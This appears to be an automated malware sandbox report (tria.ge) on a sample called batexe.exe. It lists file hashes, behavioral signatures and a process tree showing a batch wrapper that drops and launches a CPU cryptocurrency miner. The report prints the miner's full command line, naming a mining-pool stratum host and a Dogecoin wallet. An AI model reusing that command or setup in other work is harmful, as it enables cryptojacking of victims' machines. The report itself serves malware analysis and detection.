Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
293s -
max time network
299s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
20/02/2024, 17:00
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 2256 b2e.exe 3760 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3760 cpuminer-sse2.exe 3760 cpuminer-sse2.exe 3760 cpuminer-sse2.exe 3760 cpuminer-sse2.exe 3760 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/4916-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4916 wrote to memory of 2256 4916 batexe.exe 85 PID 4916 wrote to memory of 2256 4916 batexe.exe 85 PID 4916 wrote to memory of 2256 4916 batexe.exe 85 PID 2256 wrote to memory of 4280 2256 b2e.exe 86 PID 2256 wrote to memory of 4280 2256 b2e.exe 86 PID 2256 wrote to memory of 4280 2256 b2e.exe 86 PID 4280 wrote to memory of 3760 4280 cmd.exe 89 PID 4280 wrote to memory of 3760 4280 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Users\Admin\AppData\Local\Temp\6B0E.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\6B0E.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6B0E.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6F35.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3760
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.5MB
MD5e13d53382cb6861c99ed129db856a203
SHA1b07284c7c54e0088441be02600c738f68ae064de
SHA2561337fb7f19933f32739abae169d31a45f1f581d381779cd4af2ee17628fe67f5
SHA5124a9c0da23a85a4220d0d99cc50c725cf83e4268b6f694b37df1562d982c004d849403326f1cd3d9430331d0e23fcfc1297b914b95acb6ddfe19a926eece7f207
-
Filesize
2.9MB
MD5ac7022c4d89ab62ea78ba72150f81911
SHA14bb88f0660af6671ca648a0a25812099e255394b
SHA256457166d54bd661d4eabc7571193825b2af1d4e43e8c4a2cb5456967cb6aad25e
SHA51203f72e6c9db0c0bb7eb0d274daac8906a7b62fa88ffbf80c8241d4bc997af585319cb2ef725e193772c6fb9690f318c17c49a49a26d476cbf18d815a36f56be9
-
Filesize
3.1MB
MD5fed9133b08230659c3070e84537a3312
SHA199e81c297c1159861230e00d27f26df44c23d729
SHA256ba727620f51f1393fcef99ff3c2801504eff6a3b7c4abf392b036d50a9452372
SHA5129f0814c5c5849c0189c3bc511dd52c5ef81a1277030741f002d895e8d871271878f63ccb19c376f37d18f38829353e05f331ab362738e2b4f37ee9459df09081
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
441KB
MD5522c4e41902ef3a0ad2172fa6d2a193b
SHA16e08a9ee080d9e2638fd009440f2c6a376960258
SHA2563eeeaccb31af63dff43dd0926f4a7b0706484823b46f8ceaf3ca7fb1785e4a8d
SHA512d6750f882cf13c9c8507b86e81bba5f8cda3c27c97e7e6d3c85485d9e5f3f5952c321d1bc1b51ef85febbfe4b31263b5fdf5e47517b027d566db245282ae89d9
-
Filesize
451KB
MD5f4eaad17749b4522d360ad62c6a7a463
SHA1c959c44eb9cf463af38433acac0d9f63434345b1
SHA256fef3d35d71ced76685bcfe4f8f4fc09f0a9b5af5520947d550bbdb2a15c284fb
SHA512ce774086314ad9a4fdd5c706097e557800b845581e807ac52de388457630a9e19d1cdcdb24912f97528335172badd5bd3946cf582119a8f0c862a28068481da3
-
Filesize
213KB
MD5eab02fcaf248fa1c8c362365c84110c2
SHA1364dce398eb44e8f20778ebcefa47fdf7f3f0f68
SHA25656c514ceb6ce6b6c8d943d06055069989fd0cac7056694b9d1fd369da78c1ba6
SHA5121da26f3f278e1a1ad7a5505d58c4e98f33c314052e2e803a152f6ccaf83402c25e7f3beb7fd6ecbc4e4ccd75c9fd607de84ad447898fd979f8562aecb990f9af
-
Filesize
342KB
MD5824cbbeb9aa3f8bba221b4dd8d274fde
SHA1b4b2810129073da278dbd9300e208eea8dc3115c
SHA256b40a81e7e1c3e106040920fa9d13c50fd336c33ca90dd066c3ab1dc17c13edea
SHA512108a04b01e22699e09500d4f074733fecbb545aaa6d65cf427bc252f2e82e3852fbd4ac5789cbc65c125c36fa4a96572ee9a3133105e5782c9bb2074ec2ca96a
-
Filesize
421KB
MD54ee6387493365c44747b919d4148e89c
SHA1784569169ed252abb506cdac798390e60b300645
SHA25688d3cacc637590f956169c0fb59434ed22d0be51d7e5e046469b69ed8c9d7b55
SHA5122942c1afdad8b16bacea8b04e44ec195fd02a4b4448c599f414ef367b758799836fdb3805a272b98c70ddacd8ac187af7462df7e605b3f76c1a18240b2e546db
-
Filesize
229KB
MD5ac9fe102a8ad8af2f078616f206998bf
SHA1f1dda11825e491929aa8b5275c4be828b73ce9ca
SHA2560d27d91dd1d2b71a0d7281d178204b1348b2058c3c12700842aff34f6600475e
SHA512ef276599bba949a9830d8cbd305dd0d87c05c8ac6c37592b672f8069088db03926bba99d469c80ad34c3aba01506999d5a95f33ede000e44c560e96ca57a731d
-
Filesize
589KB
MD5d38dec2aac1b9a7dd2ae8cb4a7a482c7
SHA19a632dd3f64c527336482fc5cfe55318230516ce
SHA256e0b6713c1048c112a24f433605902fdb602131675009be9913abad680dc23d63
SHA5122f79a00f2dc8fa5a7ff63b3cdb5dd4b628a30ee02ad9a7b30825c12c9164795e9bf49973a0f00b8317679b26f4529ef1de172124f0e2340ce260b8c47dc9888f
-
Filesize
231KB
MD5308f010e9fa1240693a8dd7c4c6d2e4b
SHA10c3061f5318a583798cf899241b177040bfd7ca7
SHA25644cf8255dd6965d64d638e70e55499ec922e80e6fba94c2685cc9025bde09a23
SHA51204204532f70ee051e53439252c2c8cdb5d06d8accdd64a7b8d56e2253d477d89933fbad60b1d3ac09fa919c8d660f9092c7db13a575960bcda1c9fc48da03c82
-
Filesize
256KB
MD51d86b9560854472453237bcbaa2e253f
SHA15a03a7902d250377a3e9f746badcb696e2c98228
SHA2561493703a430c68bdcedcb4078486daca39a02820199e7b72017c7b1af66e1c8d
SHA512afbc3d7f8e06e41db25d666999f4d162af7054a66b17a651ac8a7f092f83580a067bfa2f558be65ace5966dffaa8735fe7a579e88bf42b34eaa3e72cdec96699
-
Filesize
357KB
MD5fb7b3dd0cf18862ca71d30242665bfc3
SHA16ce118d24b0111fe481155aadbb6b03bfcf99fce
SHA256b1cebd648bcf4c5c61da939ea4eea0065bc07ccb3620b0cc255ae794b65dc9b5
SHA5121991ba1faef8100891816266fdb4ea785b4b9d0d40fca9a3f5b6bd2cc2eda4e4023376a2a77e5851da26967d3fd3fe17957b6d33c2cf8b50c7a51cff26850e18
-
Filesize
281KB
MD5293b3aa78f2227bc28b700dbb56c00f9
SHA1aea27c4402043dfe2a8322d52cb48c6dfe4a06fc
SHA2561480fcb74cc90f4b057085dfd826811206f2386ea4ce8153402e10291a35b44e
SHA5121552c1682c9cb3561fcc2edb1ddd52259fb111365a8a77579bac32e4ed6bad998615aba3deb0184e4177f6aed9b3f9343e798dbcc68a8a513da0a102cb76a6ae